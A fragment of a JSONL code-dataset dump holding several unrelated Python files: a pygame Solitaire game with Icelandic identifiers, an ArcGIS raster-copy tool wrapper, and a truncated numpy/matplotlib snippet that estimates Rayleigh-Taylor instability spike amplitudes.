dig","sub_path":"libraries/mapdigest.py","file_name":"mapdigest.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"44790032","text":"# -*- coding: utf-8 -*-\nimport pygame\nfrom pygame.locals import *\nimport sys\nimport random\nimport pygame.image\nimport pygame.rect\nimport os.path\nimport Reglur\nfrom Spilastokkur import*\n\n\ndef cardNames():\n s = Spilastokkur()\n cards = s\n return cards\n \n \n\n '''\n for card_num in range(1, 14) :\n for card_suit in suits :\n str_card = str(card_num) if card_num > 9 else '0' + str(card_num)\n cards.append(card_suit + str_card)\n '''\n\nclass Stillingar:\n myndir_nofn = cardNames()\n mynd_path = \"Myndir/\"\n mynd_gerd = \".jpg\"\n mynd_bakhlid = 'Bakhlid'\n mynd_botn = 'bottom03'\n mynd_upplausn = (124, 174)\n upphafs_bil = 10\n rod_bil = 60\n margin_bil = 100\n tile_small_space = 20\n tile_large_space = 15\n double_speed = 500\n \ndef loadImage(name):\n image = pygame.image.load(os.path.join(Stillingar.mynd_path, str(name) + Stillingar.mynd_gerd))\n return image.convert_alpha()\n\n\n#Basic class on which all the other classes will depend\nclass AbstractObject(object):\n def __init__(self, name, pos):\n #Name of the object\n self.name = name\n #It's position and area (starts of as a 0 dimensional rect)\n self.rect = pygame.Rect(pos[0], pos[1], 0, 0) \n\n #Checks if a x, y position is in the object\n def hasPosition(self, pos) :\n if not self.visible : return False\n return self.rect.collidepoint(pos)\n\n def hasCollision(self, obj) :\n return 
self.rect.colliderect(obj.rect)\n\n #Just returns the x, y position of self.rect\n def getPosition(self) :\n return (self.rect.x, self.rect.y)\n\n #Moving objects might not be as easy as chaing rect.x, so use subclass this if necessary\n def setPosition(self, pos) :\n self.rect.x, self.rect.y = pos[0], pos[1]\n\n def movePosition(self, move) :\n self.rect.move_ip(move)\n\n\n#An object that has an image associated with it\n#Can be made invisible\nclass AbstractImage(AbstractObject) :\n def __init__(self, name, pos, image) :\n AbstractObject.__init__(self, name, pos)\n #All objects have an image (surface) associated with them.\n self.image = self.setImage(image) \n #Will this object be drawn (allows me to easily hide objects, rather than move rect off-screen)\n self.visible = True\n\n #The simple draw function that needs subclassed to be usefull\n def draw(self, screen) :\n if self.visible :\n screen.blit(image, self.rect)\n\n #Each object is associated with an image. As soon as the image is loaded, the self.rect attribute needs to be updated\n def setImage(self, image) :\n loaded = loadImage(image)\n self.rect.w, self.rect.h = loaded.get_width(), loaded.get_height()\n return loaded\n\n\n#The basic container for cards. Subsequent piles will subclass it \n#The image represents the empty pile\nclass AbstractPile(AbstractImage) :\n\n def __init__(self, name, pos, image, cards = []) :\n AbstractImage.__init__(self, name, pos, image)\n self.cards = []\n self.addCards(cards)\n\n #Are there any cards in the pile?\n def isEmpty(self) : \n if self.cards : return False\n return True\n\n #How many cards are in the pile\n def cardNum(self) : return len(self.cards)\n\n #Turns all the cards in the pile faceup or facedown\n def allFaceUp(self, boolean) :\n for card in self.cards :\n card.faceUp = boolean\n\n #Draws the bottom symbol stored in self.image (generally used to show an empty pile)\n def drawBottom(self, screen) :\n screen.blit(self.image, self.rect)\n\n #Remove cards from the top of the pile (end of the list)\n def takeCards(self, num) :\n if num > self.cardNum() or num < 0 : raise IndexError\n break_point = self.cardNum() - num\n to_take = self.cards[break_point : ] #Cards that are taken\n self.cards = self.cards [ : break_point] #Cards that remain\n return to_take\n\n def takeAll(self) :\n return self.takeCards(self.cardNum())\n\n #The setPosition function moves all the cards, rather than setting the position directly\n #This allows tiled piles to be set correctly, as using setPosition directly would make the tiled pile into simple pile \n def setPosition(self, pos) :\n x_move = pos[0] - self.rect.x\n y_move = pos[1] - self.rect.y\n\n super(AbstractPile, self).setPosition(pos)\n for card in self.cards : card.movePosition((x_move, y_move))\n\n def movePosition(self, move) :\n super(AbstractPile, self).movePosition(move)\n for card in self.cards : card.movePosition(move)\n\n #Simple function that takes cards and puts them back\n def returnCards(self, cards) :\n self.addCards(cards)\n\n #The rest of the functions need to be subclassed\n #Add a list of cards to the end of this pile. 
This is used to populate the pile originally\n def addCards(self, cards) :\n raise NotImplementedError\n\n def draw(self, screen) :\n raise NotImplementedError\n\n\n#This is the abstract class for a pile where all the cards are exactly on top of each other\n#It is fully functional if you want to just display this pile, but cannot be interacted with by user\nclass AbstractSimplePile(AbstractPile) :\n def __init__(self, name, pos, image, cards = []) :\n AbstractPile.__init__(self, name, pos, image, cards)\n\n #The draw call does not draw all the cards in the pile\n #Only the top card is drawn, as it hides all the other cards\n def draw(self, screen) :\n if not self.visible : return\n\n if self.isEmpty():\n self.drawBottom(screen)\n\n else :\n self.cards[-1].draw(screen)\n\n #Can a cards be added to this pile by the user (for this class, always no)\n def validAddCards(self, pile) :\n return False\n\n #Add a single card (the card keeps track of where it was last added)\n def addSingle(self, card) :\n card.setPosition((self.rect.x, self.rect.y))\n card.pile = self\n self.cards.append(card)\n\n #Add cards to this pile\n #If you just want to know if cards could be added by user, run validAddPile\n def addCards(self, cards) :\n for card in cards : self.addSingle(card)\n\n\n#The cards are now spread out vertically (with the last card in the list at the top)\n#The tile pile has two spacings between cards\n#init_space for the spacing when the pile is just created and add_space for the spacing when new cards are added\nclass AbstractTilePile(AbstractPile):\n def __init__(self, name, pos, image, init_space, add_space, cards = []) :\n self.init_space = init_space\n self.add_space = add_space*1.6\n AbstractPile.__init__(self, name, pos, image, cards)\n\n def draw(self, screen) :\n if not self.visible : return\n if self.isEmpty(): self.drawBottom(screen)\n for card in self.cards : card.draw(screen)\n\n #Can a cards be added to this pile by the user (for this class, always no)\n def validAddCards(self, pile) :\n return False\n\n #This function is a little strained as it has to determine if a card is being added by the user\n #Or if cards are being returned to a pristine tiled pile\n #This is to ensure that the tile spacing does arbitarily switch\n def addSingle(self, card) :\n if self.isEmpty() :\n card.setPosition((self.rect.x, self.rect.y))\n else :\n last_card = self.cards[-1]\n #If the last card is faceUp, add the card with add_space spacing\n if last_card.faceUp : card.setPosition((last_card.rect.x, last_card.rect.y + self.add_space))\n #If the last card is faceDown, it means the card should be added with the init_space\n else : card.setPosition((last_card.rect.x, last_card.rect.y + self.init_space))\n\n card.pile = self\n self.cards.append(card)\n self.updateArea() #Don't forget to update the new area\n\n #Add cards to this pile\n #If you just want to know if cards could be added by user, run validAddPile\n def addCards(self, cards) :\n for card in cards : self.addSingle(card)\n\n #The rect area actually gets bigger as more cards are added, so it needs to be updated\n def updateArea(self) :\n if self.isEmpty() : \n ref = self.image.get_rect()\n self.rect.h= ref.h\n\n else : #The hight of the tiled pile is simply the difference between the top of first and bottom of last card\n bottom = self.cards[-1].rect.bottom\n top = self.cards[0].rect.top\n self.rect.h = bottom - top\n\n #Remove cards from the top of the pile (end of the list)\n #Had to be subclassed to ensure the area is correctly updated\n def 
takeCards(self, num) :\n result = super(AbstractTilePile, self).takeCards(num)\n self.updateArea()\n return result\n\n#A abstract class that can hold multiple piles if those piles need to talk to each other\n#It does not have an image by itself, so self.rect has no dimension\n#Which means that hasPosition has to be subclassed to allow user interaction and define pile interactions\nclass AbstractMultiPile(AbstractObject) :\n def __init__(self, name, pos, space) :\n AbstractObject.__init__(self, name, pos)\n self.space = space\n self.piles = []\n\n #Each added pile is spaced by self.space from the previous pile\n def setupPile(self, new_pile) :\n displace = 0\n for pile in self.piles :\n displace += pile.rect.width + self.space \n new_pile.setPosition((self.rect.x + displace, self.rect.y))\n self.piles.append(new_pile)\n\n #Is a pile located at that position (return None if there is nothing)\n def getPile(self, pos) :\n for pile in self.piles :\n if pile.hasPosition(pos) : return pile\n\n def hasPosition(self, pos) :\n if self.getPile(pos) : return True\n return False\n\n def movePosition(self, move) :\n for pile in self.piles :\n pile.movePosition(move)\n\n def draw(self, screen) :\n for pile in self.piles :\n pile.draw(screen)\n \nclass Card(AbstractImage) :\n #The back of card image is stored here (it is the same for all cards)\n #Set if with self.loadBack()\n back_of_card = None\n\n #As static members are loaded before __main__ I cannot load the back_of_card image right away\n #This is because abstract.loadImage() calls a pygame function (convert_alpha) that requires pygame.init() to be called\n #This static function can be called to load the back_of_card image\n @staticmethod\n def loadBack(name) :\n Card.back_of_card = loadImage(name)\n\n #The two colors of the cards\n RED = 1\n BLACK = 2\n\n def __init__(self, name, pos) :\n #The name of the card is 01-13[cdhs]\n #Notice that the image for the card is specified by its name\n AbstractImage.__init__(self, name, pos, name)\n \n\n #Sometimes it is necessary to keep track of what pile a card is in\n self.pile = None\n\n self.faceUp = True\n\n def getNumber(self): int(self.name[-2:])\n \n def getSuit(self): return self.name[0]\n\n def getColor(self) :\n if self.getSuit() == 't' or self.getSuit() == 'h' : return Card.RED\n else: return Card.BLACK\n\n def sameColor(self, card) :\n return self.getColor() == card.getColor()\n\n def draw(self, screen) :\n if self.visible :\n image = self.image if self.faceUp else Card.back_of_card\n screen.blit(image, self.rect)\n\n#Encodes the draw and discard pile of the game\n#The left draw pile if face down and upon click moves the top card onto the right discard pile faceup\n#If the draw pile is empty, it takes all the cards from the discard pile\nclass StartPile(AbstractMultiPile) :\n DRAW = 0\n DISCARD = 1\n\n def __init__(self, name, pos, space, bottom, cards = []) :\n AbstractMultiPile.__init__(self, name, pos, space)\n self.setupPile(self.setupDraw(cards, bottom))\n self.setupPile(self.setupDiscard(bottom))\n\n #For the two setup functions, the position does not matter, as the setupPile function will correctly position the piles\n def setupDraw(self, cards, bottom) :\n draw_pile = AbstractSimplePile('Draw', (0,0), bottom, cards)\n draw_pile.allFaceUp(False)\n return draw_pile\n\n def setupDiscard(self, bottom) :\n discard_pile = AbstractSimplePile('Discard', (0,0), bottom)\n return discard_pile\n\n # If the draw pile is clicked \n def drawUpClick(self) :\n if not self.piles[StartPile.DRAW].isEmpty() : 
\n take_cards = self.piles[StartPile.DRAW].takeCards(1) #If the pile is not empty, get the top most card\n take_cards[0].faceUp = True\n self.piles[StartPile.DISCARD].addCards(take_cards) #Add the card to discard\n\n else : #Otherwise, move all the cards from discard to draw and but them facedowm\n self.piles[StartPile.DISCARD].allFaceUp(False)\n all_cards = self.piles[StartPile.DISCARD].takeAll()\n all_cards.reverse()\n self.piles[StartPile.DRAW].addCards(all_cards)\n\n #On click\n def onClick(self, event) :\n clicked_pile = self.getPile(event.pos)\n\n if not clicked_pile : return #Sanity check, just in case onClick was called accidentaly\n if not clicked_pile.visible: return\n\n if event.type == MOUSEBUTTONUP and event.button == 1 :\n if clicked_pile.name == 'Draw' : \n self.drawUpClick()\n\n #Discard pile just returns the top card in a pile\n if event.type == MOUSEBUTTONDOWN and event.button == 1 :\n if clicked_pile.name == 'Discard' and not clicked_pile.isEmpty(): return clicked_pile.takeCards(1)\n\n #Double click is always MOUSEUP.\n #For the draw pile, does the same as single click\n #THe discard pile does not respond to single up clicks, but the double click takes the top card\n def onDoubleClick(self, event) :\n clicked_pile = self.getPile(event.pos)\n if not clicked_pile : return #Sanity check, just in case onClick was called accidentaly\n if not clicked_pile.visible: return\n\n if clicked_pile.name == 'Draw' : self.drawUpClick()\n if clicked_pile.name == 'Discard' and not clicked_pile.isEmpty() : return clicked_pile.takeCards(1)\n\n #Can cards be added to any of the piles\n def validAddCards(self, cards) :\n return False\n\n\n\n#The 7 tiled piles that make up the main playing field\nclass MainPile(AbstractTilePile) :\n def __init__(self, name, pos, image, init_space, add_space, cards = []) :\n self.pileSetup(cards)\n AbstractTilePile.__init__(self, name, pos, image, init_space, add_space, cards)\n\n #All but the last card in the pile is facedown\n def pileSetup(self, cards) :\n for card in cards : card.faceUp = False\n if cards: cards[-1].faceUp = True\n\n #This function returns the top most card on the deck that was clicked\n #If no card was clicked, returns -1\n def topCardClicked(self, pos) :\n result = -1\n for i, card in enumerate(self.cards) :\n if card.hasPosition(pos) : result = i\n\n return result\n\n def onClick(self, event) :\n if not self.visible : return\n\n #When clicked down, return all the cards including and after the card clicked\n if event.type == MOUSEBUTTONDOWN and event.button == 1 :\n card_clicked = self.topCardClicked(event.pos)\n if card_clicked != -1 and self.cards[card_clicked].faceUp:\n cards_to_take = self.cardNum() - card_clicked\n return self.takeCards(cards_to_take)\n\n #If the last card in the pile if face down, an upclick will turn in around\n if event.type == MOUSEBUTTONUP and event.button == 1 :\n if not self.isEmpty() and self.cards[-1].hasPosition(event.pos) :\n self.cards[-1].faceUp = True\n\n #Returns the last card in the pile if it is faced up and has been clicked\n def onDoubleClick(self, event) :\n if not self.visible : return\n\n card_clicked = self.topCardClicked(event.pos)\n if card_clicked != -1 and self.cards[card_clicked].faceUp and card_clicked == self.cardNum() - 1:\n return self.takeCards(1)\n\n #can these cards be added to this pile by the user\n #We only care about the first card in cards\n #implicit assumption is that the rest of the program makes sure the order of the cards remains valid\n def validAddCards(self, cards) :\n 
#Only a king can be added to an empty pile\n if self.isEmpty() :\n if cards[0].getNumber() == 13 and self.hasCollision(cards[0]) : \n return True\n else:\n ref_card = self.cards[-1] # The top most card of the pile determines validity\n if not ref_card.faceUp : #Card must be faceup to be seen when it is added to\n return False \n\n if not ref_card.sameColor(cards[0]) and ref_card.getNumber() == cards[0].getNumber() + 1 :\n if ref_card.hasCollision(cards[0]) : \n return True\n\n return False\n\n\n#A simple pile that only allows addition of one card with increasing value with the same suit\n#When empty, can accept only aces (the ace added will determine the suit)\n#Keeps track of how many cards have been added to any SuitPile (for the win condition of 52)\nclass SuitPile(AbstractSimplePile) :\n total_cards = 0\n\n def __init__(self, name, pos, image) :\n AbstractSimplePile.__init__(self, name, pos, image)\n\n #validAddCards has to be expended\n #If contact is true, the added card must be in touch with the suit pile\n #This matters because double clicking a card can directly move it to a suit pile\n def validAddCards(self, cards, contact = True) :\n if contact : \n if not self.hasCollision(cards[0]): return False\n if len(cards) != 1 : return False\n\n if self.isEmpty() :\n if cards[0].getNumber() == 1: return True\n return False\n\n ref_card = self.cards[-1]\n if ref_card.getSuit() == cards[0].getSuit() and ref_card.getNumber() + 1 == cards[0].getNumber() :\n return True\n return False\n\n #On click\n def onClick(self, event) :\n if not self.visible : return False\n\n if event.type == MOUSEBUTTONDOWN and event.button == 1 :\n if not self.isEmpty(): return self.takeCards(1)\n\n def onDoubleClick(self, event) :\n pass\n\n #To keep track of the total number of cards in SuitPiles, add and take card function need to be expanded\n def takeCards(self, num) :\n cards_taken = super(SuitPile, self).takeCards(num)\n SuitPile.total_cards -= num\n return cards_taken\n\n def addSingle(self, card) :\n super(SuitPile, self).addSingle(card)\n SuitPile.total_cards += 1\n\n#This class allows for cards to be easily moved around\n#It takes cards from a pile and keeps them in the same relative positions while they are moved around\n#It also keeps track of where the cards came from and can return it if necessary\nclass Repository(object) :\n def __init__(self, name) :\n self.name = name\n self.cards = []\n self.source = None\n\n def addCards(self, cards) :\n if self.source or self.cards : raise Exception\n if cards :\n self.cards = cards\n self.source = cards[0].pile\n\n def hasCards(self) : \n if self.cards : return True\n return False\n\n def clear(self) :\n self.cards = []\n self.source = None\n\n def returnCards(self) :\n self.source.addCards(self.cards)\n self.clear()\n\n #Move the card to the pile (please check if the move if valid first)\n def addToPile(self, pile) :\n pile.addCards(self.cards)\n self.clear()\n \n def draw(self, screen) :\n for card in self.cards : card.draw(screen)\n\n def movePosition(self, move) :\n for card in self.cards : card.movePosition(move)\n \nclass DoubleClick :\n def __init__(self) :\n self.double_click = pygame.time.Clock()\n self.time = 0 #Necessary to temporary store time passed after checking second down click\n self.first_click = True #Is this the first click in the double click\n self.wasDC = False #Was the alst call to isDC() a double click\n\n #Implementing double click was a lot harder than initially thought\n #A double click starts on a mouse down and ends on the 
second mouse up\n #If there is too much time between the first and second mouse down, the second mouse down will be treated as a first\n def isDC(self, event) :\n if event.type == MOUSEBUTTONDOWN and event.button == 1 :\n click_time = self.double_click.tick() #Check how long since last click\n if not self.first_click : #If it's the first click, exit function with False\n #If it's the second downclick, make sure that a double click is still a possibility \n #If not, make this down click the first click\n #Since tick() was called, store time passed in self.time, to be added to the upclick later\n if click_time > Stillingar.double_speed : self.first_click = True\n else : self.time = click_time\n\n if event.type == MOUSEBUTTONUP and event.button == 1 :\n if not self.first_click : #If it's the second click\n click_time = self.double_click.tick() #Get time since last click (the second down click)\n self.first_click = True #The next click will again be first\n if click_time + self.time < Stillingar.double_speed : #Add the click_time and self.time and check if fast enough\n self.wasDC = True \n return True\n else : self.first_click = False #If it was first first upclick, now the second_click is expected\n #If we get to here, no double click was detected \n self.wasDC = False\n return False\n\n\nclass Game :\n def __init__(self) :\n pygame.init()\n random.seed()\n\n self.screen = self.setDisplay() #Display dimensions\n self.double_click = DoubleClick() #Double click checker\n self.move_pile = Repository('Repository') #For moving piles\n\n self.cards = self.loadCards() #All the cards\n self.piles = self.populatePiles() #All the piles\n\n #The display dimensions are calculated given the wanted margins and card dimensions\n def setDisplay(self) :\n x_dim = (Stillingar.margin_bil * 2) + (Stillingar.mynd_upplausn[0] * 7) + (Stillingar.upphafs_bil * 6)\n y_dim = Stillingar.margin_bil + (Stillingar.mynd_upplausn[1] * 2) + Stillingar.rod_bil\n y_dim += (Stillingar.tile_small_space * 6) + (Stillingar.tile_large_space * 12)\n return pygame.display.set_mode((x_dim, y_dim))\n\n #Load the cards (the common card back and the card images)\n def loadCards(self) :\n Card.loadBack(Stillingar.mynd_bakhlid)\n cards = [Card(x, (0, 0)) for x in Stillingar.myndir_nofn]\n random.shuffle(cards)\n return cards\n\n #Place the piles (are reset the SuitPile win number down to 0)\n def populatePiles(self) :\n piles = []\n suit_piles = []\n SuitPile.total_cards = 0\n\n marker = 0 #Keeps track of the last card added\n x = Stillingar.margin_bil #The x_position of the pile\n y = Stillingar.margin_bil + Stillingar.mynd_upplausn[1] + Stillingar.rod_bil\n for i in range(1,8) : #Need seven main piles\n pile_name = 'Main' + str(i)\n cards = self.cards[marker : i + marker] #Each pile position also tells me how many cards it needs\n piles.append(MainPile(pile_name, (x, y), Stillingar.mynd_botn, Stillingar.tile_small_space, Stillingar.tile_large_space, cards))\n\n #The suit piles are exactly above main piles (starting on the four one)\n if i > 3 : suit_piles.append(SuitPile('Suit' + str(i - 3), (x, Stillingar.margin_bil), Stillingar.mynd_botn))\n\n #tick along x and marker\n x += piles[-1].rect.w + Stillingar.upphafs_bil\n marker = i + marker\n\n #Add the start pile \n cards = self.cards[marker : 52] #The remaining cards\n piles.append(StartPile('Start', (Stillingar.margin_bil, Stillingar.margin_bil), Stillingar.upphafs_bil, Stillingar.mynd_botn, cards))\n\n piles.extend(suit_piles) #The last four piles always must be the suit piles\n 
return piles\n\n #simply gets the pile that was clicked (none if no pile was clicked)\n def clickedPile(self, event) :\n for pile in self.piles :\n if pile.hasPosition(event.pos) : return pile\n\n #The basic idea of the game loop is thus :\n #If a pile is clicked, onClick() is run\n #If onClick() returns cards, this means that these cards can be moved around (while mouse is held down)\n #The moving of cards is performed by self.move_pile\n #With a double click, the down, up, and and click are read as single clicks (and still run as such)\n #The lst up click will result in onDoubleClick being called \n def gameLoop(self) :\n while True :\n if self.winCondition() : \n self.browninanMotion(2) #Move the piles around randomly if game has been won\n\n for event in pygame.event.get() :\n #Check and store if a double click occured\n if (event.type == MOUSEBUTTONUP or event.type == MOUSEBUTTONDOWN) and event.button == 1 :\n self.double_click.isDC(event)\n\n #Check if the program is quit\n if event.type == QUIT :\n pygame.quit()\n sys.exit() \n\n #Pressing r resets the program\n if event.type == KEYUP and event.key == K_r :\n self.reset()\n\n #If the game has been won, reset it with a mouse click\n if self.winCondition():\n if event.type == MOUSEBUTTONUP and event.button == 1 :\n self.reset()\n\n #Now for the main meat of the program\n else :\n if event.type == MOUSEBUTTONUP and event.button == 1 :\n #Is the user currently dragging cards (and now wants to let them go)\n #I store it as the I need to check this variable again later and the cards might have been released\n move_pile_full = self.move_pile.hasCards() \n\n if move_pile_full : #If yes\n #This finds the left most pile where the dropped cards are accepted\n selected_pile = None\n for pile in self.piles :\n if pile.validAddCards(self.move_pile.cards) : \n selected_pile = pile\n break\n\n #If a valid pile is found, drop the cards there, otherwise return the cards\n if selected_pile : self.move_pile.addToPile(selected_pile)\n else : self.move_pile.returnCards()\n\n\n\n #If the move_pile was empty and no double click, just run a simple onClick on the pile\n if not move_pile_full and not self.double_click.wasDC :\n clicked_pile = self.clickedPile(event)\n\n if clicked_pile :\n clicked_pile.onClick(event)\n\n #If mouse is held down, move those cards to the self.move_pile\n if event.type == MOUSEBUTTONDOWN and event.button == 1 :\n clicked_pile = self.clickedPile(event)\n\n if clicked_pile :\n cards_taken = clicked_pile.onClick(event)\n if cards_taken : self.move_pile.addCards(cards_taken)\n\n #if the mouse is moved, move the mouse_pile (if it has cards)\n if event.type == MOUSEMOTION :\n if self.move_pile.hasCards() : self.move_pile.movePosition(event.rel)\n\n self.screen.fill((0, 0, 0))\n self.draw()\n pygame.display.flip()\n\n\n\n\n \n \n\n #Draw is simple, just draw all the piles\n def draw(self) :\n for pile in self.piles :\n pile.draw(self.screen)\n\n self.move_pile.draw(self.screen)\n\n def start(self) :\n self.gameLoop()\n\n #When all the cards are in the suit pile\n def winCondition(self) :\n return SuitPile.total_cards == len(self.cards)\n\n #Moves the piles randomly in all directions (the length arguement specifies how hard they move)\n def browninanMotion(self, length) :\n for pile in self.piles :\n x_move = random.randint(-length, length)\n y_move = random.randint(-length, length)\n pile.movePosition((x_move, y_move))\n\n def reset(self) :\n self.cards = self.loadCards()\n self.piles = self.populatePiles()\n\nif __name__ == 
\"__main__\": \n g = Game()\n g.start()\n","sub_path":"Solitaire/SnorriPrufa/SolitaireGUI/src/SolitaireGui.py","file_name":"SolitaireGui.py","file_ext":"py","file_size_in_byte":29249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"534315746","text":"from base.base_tool import BaseTool\n\nfrom base import utils\nfrom base.decorators import input_tableview, input_output_table, parameter, raster_formats, pixel_type, raster_formats2\nimport arcpy\n\n\ntool_settings = {\"label\": \"Copy\",\n \"description\": \"Copy rasters...\",\n \"can_run_background\": \"True\",\n \"category\": \"Raster\"}\n\nfrom os.path import splitext, join\n\n\ndef splitext_(path):\n if len(path.split('.')) > 2:\n return path.split('.')[0], '.'.join(path.split('.')[-2:])\n return splitext(path)\n\n\nclass CopyRasterTool(BaseTool):\n \"\"\"\n \"\"\"\n\n def __init__(self):\n \"\"\"\n\n Returns:\n\n \"\"\"\n\n BaseTool.__init__(self, tool_settings)\n\n self.execution_list = [self.iterate]\n\n return\n\n @input_tableview(data_type=\"raster\")\n @parameter(\"raster_format\", \"Output Raster Format\", \"GPString\", \"Optional\", False, \"Input\", raster_formats2, None, None, \"Esri Grid\")\n @parameter(\"config_keyword\", \"Config Keyword\", \"GPString\", \"Optional\", False, \"Input\", None, None, None, None, \"Options\")\n @parameter(\"background_value\", \"Background Value\", \"GPDouble\", \"Optional\", False, \"Input\", None, None, None, None, \"Options\")\n @parameter(\"nodata_value\", \"NoData Value\", \"GPString\", \"Optional\", False, \"Input\", None, None, None, None, \"Options\")\n @parameter(\"onebit_to_eightbit\", \"1 bit to 8 bit\", \"GPString\", \"Optional\", False, \"Input\", [\"NONE\", \"OneBitTo8Bit\"], None, None, \"NONE\", \"Options\")\n @parameter(\"colormap_to_RGB\", \"Colourmap to RGB\", \"GPString\", \"Optional\", False, \"Input\", [\"NONE\", \"ColormapToRGB\"], None, None, \"NONE\", \"Options\")\n @parameter(\"pixel_type\", \"Pixel Type\", \"GPString\", \"Optional\", False, \"Input\", pixel_type, None, None, None, \"Options\")\n @parameter(\"scale_pixel_value\", \"Scale Pixel value\", \"GPString\", \"Optional\", False, \"Input\", [\"NONE\", \"ScalePixelValue\"], None, None, None, \"Options\")\n @parameter(\"RGB_to_Colormap\", \"RGB to Colourmap\", \"GPString\", \"Optional\", False, \"Input\", [\"NONE\", \"RGBToColormap\"], None, None, None, \"Options\")\n @parameter(\"transform\", \"Transform\", \"GPString\", \"Optional\", False, \"Input\", None, None, None, None, \"Options\")\n @parameter(\"bands\", \"Bands\", \"GPLong\", \"Optional\", True, \"Input\", None, None, None, None, \"Options\")\n @input_output_table(affixing=True)\n def getParameterInfo(self):\n \"\"\"\n\n Returns:\n\n \"\"\"\n\n return BaseTool.getParameterInfo(self)\n\n def iterate(self):\n \"\"\"\n\n Returns:\n\n \"\"\"\n\n self.iterate_function_on_tableview(self.copy, return_to_results=False)\n\n return\n\n def copy(self, data):\n \"\"\"\n\n Args:\n data:\n\n Returns:\n\n \"\"\"\n self.info(data)\n\n ras = data[\"raster\"]\n\n utils.validate_geodata(ras, raster=True)\n\n ws = self.output_file_workspace or self.output_workspace\n\n ras_out = utils.make_table_name(ras, ws, self.raster_format, self.output_filename_prefix, self.output_filename_suffix)\n\n self.info(\"Copying {0} -->> {1} ...\".format(ras, ras_out))\n # arcpy.CopyRaster_management(ras, ras_out, self.config_keyword, self.background_value, self.nodata_value, self.onebit_to_eightbit, self.colormap_to_RGB, self.pixel_type, 
self.scale_pixel_value, self.RGB_to_Colormap, self.raster_format, self.transform)\n\n if self.bands:\n for band in self.bands:\n try:\n band = \"Band_{}\".format(band)\n rasband = join(ras, band)\n ras_out = utils.make_table_name(ras, self.output_file_workspace, self.raster_format, self.output_filename_prefix, self.output_filename_suffix + \"_{}\".format(band))\n self.info(band)\n self.info(rasband)\n self.info(ras_out)\n arcpy.CopyRaster_management(rasband, ras_out, self.config_keyword, self.background_value, self.nodata_value, self.onebit_to_eightbit,\n self.colormap_to_RGB, self.pixel_type, self.scale_pixel_value, self.RGB_to_Colormap, None, self.transform)\n self.result.add_pass({\"raster\": ras_out, \"source_geodata\": rasband})\n except:\n self.result.add_fail(data)\n else:\n try:\n ras_out = utils.make_table_name(ras, self.output_file_workspace, self.raster_format, self.output_filename_prefix, self.output_filename_suffix)\n arcpy.CopyRaster_management(ras, ras_out, self.config_keyword, self.background_value, self.nodata_value, self.onebit_to_eightbit, self.colormap_to_RGB, self.pixel_type, self.scale_pixel_value, self.RGB_to_Colormap, None, self.transform)\n self.result.add_pass({\"raster\": ras_out, \"source_geodata\": ras})\n except:\n self.result.add_fail(data)\n\n # return {\"raster\": ras_out, \"source_geodata\": ras}\n\n# \"http://desktop.arcgis.com/en/arcmap/latest/tools/data-management-toolbox/copy-raster.htm\"\n# CopyRaster_management (in_raster, out_rasterdataset, {config_keyword}, {background_value}, {nodata_value}, {onebit_to_eightbit}, {colormap_to_RGB}, {pixel_type}, {scale_pixel_value}, {RGB_to_Colormap}, {format}, {transform})\n","sub_path":"tools/raster/copy.py","file_name":"copy.py","file_ext":"py","file_size_in_byte":5258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"310121848","text":"\nts = np.argmin(np.abs(h2d.g.times-h2d.g.bt))\nnpts = int(5*np.max(h2d.g.modes))\namps = np.zeros((npts)) \nrad = h2d.g.r_abl[1,ts] # 430 #ablation front radius\ncirc = 2*np.pi*rad #ablation front circumference\ncircs = np.linspace(0,circ,npts)\nrand_ph = 2*np.pi*np.random.rand(od.gs.max_rough_mode+1)\n#mode spectrum including all amps\namps = np.sum(h2d.g.rt_amp_haan[:,ts]*np.sin(2*np.pi*circs[:,np.newaxis]/h2d.g.rt_lambda[:,ts]+rand_ph),axis=1)\namps -= h2d.g.thk_shell[1,ts]\namps[amps<0] = 0\n\n\nnpts = int(5*np.max(h2d.g.modes))\namps = np.zeros((npts)) \nrad = h2d.g.r_abl[1,ts] # 430 #ablation front radius\ncirc = 2*np.pi*rad #ablation front circumference\ncircs = np.linspace(0,circ,npts)\nh2d.g.rand_ph = 2*np.pi*np.random.rand(od.gs.max_rough_mode+1)\namps = np.sum(h2d.g.rt_amp_haan[:,ts]*np.sin(2*np.pi*circs[:,np.newaxis]/h2d.g.rt_lambda[:,ts]+h2d.g.rand_ph),axis=1)\namps -= h2d.g.thk_shell[1,ts]\namps[amps<0] = 0\n\ni0 = np.where(amps==0)[0]\ndi = np.diff(i0)\ndi0 = i0[np.where(di>1)[0]]\n\nip = np.where(amps>0)[0]\ndi = np.diff(ip)\ndip = ip[np.where(di>1)[0]]\n\n\nplt.figure(21);plt.clf()\nplt.plot(circs,amps)\nplt.plot(circs[i0],amps[i0])\nplt.plot(circs[di0],amps[di0],'or')\nplt.plot(circs[dip],amps[dip],'ok')\nia = np.arange(0,len(amps),dtype=int)[di0]\nib = np.arange(0,len(amps),dtype=int)[dip]\nic= np.sort(np.append(ia,ib))\n#plt.plot(circs[ic],amps[ic],'om')\nvols=0\niall = np.arange(0,len(circs))\n#each peak is approximated as a cone \nfor n in range(len(ia)-1):\n ipk = iall[ia[n]+np.argmax(amps[ia[n]:ib[n]])]\n plt.plot(circs[ipk],amps[ipk],'oc')\n r = 0.5*(circs[ib[n]] - circs[ia[n]])\n h = amps[ipk]\n 
